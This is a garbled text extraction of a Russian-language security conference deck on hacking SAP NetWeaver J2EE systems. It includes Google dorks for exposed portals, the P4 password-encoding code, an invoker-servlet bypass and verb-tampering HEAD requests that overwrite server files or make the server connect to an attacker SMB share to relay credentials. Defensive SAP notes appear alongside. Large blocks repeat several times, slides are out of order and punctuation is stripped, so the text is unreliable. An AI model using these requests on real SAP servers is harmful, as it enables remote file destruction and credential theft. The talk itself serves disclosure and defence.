20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Уязвимый алгоритм шифрования паролей в P4
erpscancom 31ERPScan mdash invest in security to secure investments
87 char mask = 43690 88 char check = 21845 89 char[] result = new char[datalength + 1] 91 for (int i = 0 i lt datalength ++i) 92 mask = (char)(mask ^ data[i]) 93 result[i] = mask 95 result[datalength] = (char)(mask ^ check) 97 return result
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Защита
erpscancom 32ERPScan mdash invest in security to secure investments
bull Используйте SSL для шифрования всех соединений между SAP системамиhttphelpsapcomsaphelp_nwpi71helpdatade14ef2940cbf2195de10000000a1550b0contenthtm
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
erpscancom 49ERPScan mdash invest in security to secure investments
Web Dynpro - programmatic Portal iViews - programmatic J2EE Web apps - declarative или programmatic
Programmatic Используя UME
Declarative Используя WEBXML
Декларативная аутентификация
erpscancom 50ERPScan mdash invest in security to secure investments
ltservletgt ltservlet-namegtCriticalActionltservlet-namegt ltservlet-classgtcomsapadminCriticalActionltservlet-classgt ltservletgtltservlet-mappinggt ltservlet-namegtCriticalActionltltservlet-namegt lturl-patterngtadmincriticallturl-patterngt ltservlet-mappinggtltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongtltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Обход аутентификации Invoker Servlet
erpscancom 51ERPScan mdash invest in security to secure investments
bull Можно вызвать любой сервлет напрямую по имени классаbull Пример вызова - servletcomsapadminCriticalAction
bull Порядка 30 приложений из 150 уязвимо (SAP ECC 6)
Защита
erpscancom 52ERPScan mdash invest in security to secure investments
bull Параметр ldquoEnableInvokerServletGloballyrdquo установить в ldquofalserdquo bull Для включения опции только для конкретных приложений - note 1445998bull Для SAP NetWeaver Portal ndash note 1467771bull Для поиска потенциальных уязвимостей в собственных приложениях - ERPScan webxml scanner manually
Массовый взлом
bull
erpscancom 53ERPScan mdash invest in security to secure investments
I have a dream helliphellip
Уязвимость Verb Tampering
erpscancom 54ERPScan mdash invest in security to secure investments
А что если попробовать HEAD вместо GET
ltsecurity-constraintgtltweb-resource-collectiongtltweb-resource-namegtRestrictedaccessltweb-resource-namegtlturl-patterngtadminlturl-patterngtlthttp-methodgtGETlthttp-methodgtltweb-resource-collectiongt ltauth-constraintgt ltrole-namegtadminltrole-namegt ltauth-constraintgtltsecurity-constraintgt
Отказ в обслуживании
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL=DusrsapDM0SYSprofile HTTP10
erpscancom 55ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса перезаписать любой файл на системе удалённо из сети
интернет
Получение доступа к ОС
Приложение Integration Directory
HEAD dirsupportCheckServicecmd_checkampfileNameL=DEFAULT1PFLamp directoryNameL= smbsniffersniff HTTP10
erpscancom 56ERPScan mdash invest in security to secure investments
Любой злоумышленник может с помощью одного запроса получить административный доступ к SAP серверу под
управлением Windows
Полный контроль
bull Обнаружили секретный интерфейс для управления JAVA движкомndash Удалённое администрирование пользователейndash Доступ к ОСndash Выполнение произвольных командndash Выключение сервера
bull Установлен по умолчаниюbull Уязвим к Verb Tamperingbull Атака возможна без аутентификации из Интернет
erpscancom 57ERPScan mdash invest in security to secure investments
Взломать SAP за 60 секунд
ДЕМООООООООООООО
erpscancom 58ERPScan mdash invest in security to secure investments
Победа
erpscancom 59ERPScan mdash invest in security to secure investments
Защита
erpscancom 60ERPScan mdash invest in security to secure investments
bull SAP note 1503579 1616259bull ERPScan WEBXML check toolbull Отключение ненужных сервисов
Итоги
Проблема ответственности и контроля
erpscancom 61ERPScan mdash invest in security to secure investments
Будущая работа
Конференцииbull 11 October - HITB в Кула-Лумпуре (Малайзия)bull 25 October - HackerHalted в Miami (США)bull 25 November ndash ZeroNights в Санкт-Петербурге (Россия)
Новостиbull dsecrgru bull erpscanru
Cпасибоbull Дмитрий Частухин Дмитрий Евдокимов Алексей Cинцов Алексей Тюрин Павел
Кузьмин Антон Спирин bull Организаторам Risspa
Опросbull Тренинг по безопасности SAP
erpscancom 62ERPScan mdash invest in security to secure investments
ZeroNights mdash международная конференция посвященная техническим аспектам информационной безопасности На конференции выступят известные эксперты отрасли из России Европы США Индии Сингапура и других стран Главная цель конференции mdash распространение информации о новых методах атак угроз и защиты от них а кроме того создание площадки для общения специалистов-практиков по ИБ
- Взломать SAP за 60 cекунд Александр Поляков Технический Дирек
- я
- Доклады о безопасности SAP
- Количество SAP notes за год
- Публичная информация об уязвимостях
- SAP не дремлет
- Поговорим о безопасности
- Что мы знаем о SAP
- SAP Who cares
- Постоянные новые угрозы
- Как атакуют
- Последний год
- Угрозы для бизнеса
- Как защищаемся
- Что происходит сейчас
- Slide 16
- 1001 Способ обойти SOD
- Не диалоговые пользователи
- Атаки на Gateway и Message Server
- Хитрые настройки
- Прямой доступ к таблицам
- Доступ из интернет + уязвимости
- Атаки на ICM (ABAP)
- Прочие небезопасные сервисы
- Атаки на J2EE Engine
- J2EE Platform Architecture
- Удалённый доступ
- Уязвимый алгоритм шифрования паролей в P4
- Уязвимый алгоритм шифрования паролей в P4 (2)
- Уязвимый алгоритм шифрования паролей в P4 (3)
- Уязвимый алгоритм шифрования паролей в P4 (4)
- Защита
- Взлом из интернет
- Из чего состоит J2EE Engine
- Из чего состоит J2EE Engine (2)
- Из чего состоит J2EE Engine (3)
- Из чего состоит J2EE Engine (4)
- Раскрытие информации
- Раскрытие информации DSECRG-11-023
- Раскрытие информации DSECRG-11-027
- Раскрытие информации DSECRG-11-032
- Раскрытие информации DSECRG-00231
- Защита (2)
- Межсайтовый скриптинг
- SMBRelay
- CSRF + SmbRelay = CSSR
- Защита от CSRF
- SPML
- Аутентификация
- Декларативная аутентификация
- Обход аутентификации Invoker Servlet
- Защита (3)
- Массовый взлом
- Уязвимость Verb Tampering
- Отказ в обслуживании
- Получение доступа к ОС
- Полный контроль
- Взломать SAP за 60 секунд
- Победа
- Защита (4)
- Итоги
- Будущая работа
- Slide 63
-
Взлом из интернет
erpscancom 33ERPScan mdash invest in security to secure investments
SAP системы доступны только из внутренней сети о да в самом деле
inurlirjportal inurlIciEventService sapinurlIciEventServiceIciEventConfinurlwsnavigatorjspstestjspinurlirjgokmdocs
Из чего состоит J2EE Engine
erpscancom 34ERPScan mdash invest in security to secure investments
SAP NetWeaver 64
300 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 35ERPScan mdash invest in security to secure investments
SAP NetWeaver 70
500 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 36ERPScan mdash invest in security to secure investments
SAP NetWeaver 71
800 web ndashприложений
Из чего состоит J2EE Engine
erpscancom 37ERPScan mdash invest in security to secure investments
SAP NetWeaver 72
1200 web ndashприложений и это только в TRIAL
Раскрытие информации
erpscancom 38ERPScan mdash invest in security to secure investments
bull Версия системыDSECRG-11-023DSECRG-11-027 DSECRG-00208
bull Логи и трейсыDSECRG-00191DSECRG-00232
bull Имена пользователейDSECRG-11-034
bull Сканирование внутренней сети через внешний уязвимый сервер
DSECRG-11-032 DSECRG-00175
New
New
Раскрытие информации DSECRG-11-023
erpscancom 39ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-027
erpscancom 40ERPScan mdash invest in security to secure investments
Раскрытие информации DSECRG-11-032
erpscancom 41ERPScan mdash invest in security to secure investments
Host is not alive
Port closed
HTTP port
SAP port
Раскрытие информации DSECRG-00231
erpscancom 42ERPScan mdash invest in security to secure investments
Защита
erpscancom 43ERPScan mdash invest in security to secure investments
bull SAP notes154854815458831503856948851 1545883
bull Удаление ненужных и не поддерживаемых приложений
Межсайтовый скриптинг
erpscancom 44ERPScan mdash invest in security to secure investments
15092011 [DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked ХSS vulnerability
19082011 [DSECRG-11-030] SAP NetWeaver JavaMailExamples - XSS
19072011 [DSECRG-11-028] SAP NetWeaver ISpeak ndash XSS
20062011 [DSECRG-11-024 ] SAP NetWeaver performance Provier Root - XSS20062011 [DSECRG-11-025 ] SAP NetWeaver Trust Center Service - XSS12042011 [DSECRG-11-016] SAP NetWeaver Data Archiving Service - multiple XSS12042011 [DSECRG-11-015] SAP NetWeaver MessagingServer - XSS14032011 [DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS14032011 [DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS14032011 [DSECRG-11-011] SAP Crystal Reports 2008 - Multiple XSS14032011 [DSECRG-11-010] SAP NetWeaver logonhtml - XSS14032011 [DSECRG-11-009] SAP NetWeaver XI SOAP Adapter - XSS
14122010 [DSECRG-09-067] SAP NetWeaver DTR - Multiple XSS14122010 [DSECRG-10-009] SAP NetWeaver ExchangeProfile - XSS14122010 [DSECRG-10-008] SAP NetWaver JPR Proxy Server - Multiple XSS14122010 [DSECRG-10-007] SAP NetWeaver Component Build Service - XSS11112010 [DSECRG-09-056] SAP Netweaver SQL Monitors - Multiple XSS
И это только те что закрыты
SMBRelay
erpscancom 45ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
CSRF + SmbRelay = CSSR
erpscancom 46ERPScan mdash invest in security to secure investments
httpserverportmmrMMRfilename=smbsnifferanyfile
Заставь нажать на эту ссылку того у кого есть к ней доступ
Защита от CSRF
erpscancom 47ERPScan mdash invest in security to secure investments
Встроенное API для защиты от CSRF
bull Standard XSRF Protection Вся работа реализуется сервером приложений (простые GETPOST)
bull Custom CSRF Protection Обработка CSRF токенов на разработчике
Есть множество мест где эта защита не реализована
SPML
erpscancom 48ERPScan mdash invest in security to secure investments
Аутентификация
